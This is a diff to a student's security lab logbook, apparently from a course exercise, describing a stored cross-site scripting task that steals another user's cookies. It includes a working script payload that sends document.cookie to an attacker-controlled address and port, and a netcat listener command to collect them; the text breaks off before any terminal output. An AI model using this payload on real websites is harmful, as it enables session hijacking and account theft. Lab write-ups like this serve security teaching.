racoelhosilva/FSI_ctfsAndLogbooks/LOGBOOK7.md

 ### Task 3: Stealing Cookies from the Victim’s Machine

-In this task, our objective was to retrieve cookies from another user.
+In this task, our objective was to retrieve cookies from another user and access them from another source.
+To do this, we decided to use the following script:

-Programm to insert:
 ```html
 <script>
     document.write('<img src=http://10.9.0.1:5555?c=' + escape(document.cookie) + ' >');
 </script>
 ```

 This code sends the cookies to port 5555, so we needed to listen on this port by using the command `nc -lknv 5555` in our terminal.
-We placed the code in Alice's profile and then logged in with Boby's account.
+After this, if we placed the code in Alice's profile, log in with Boby's account and visit Alice's profile, the script would be executed and we would receive the cookies in the terminal.

 The output from terminal: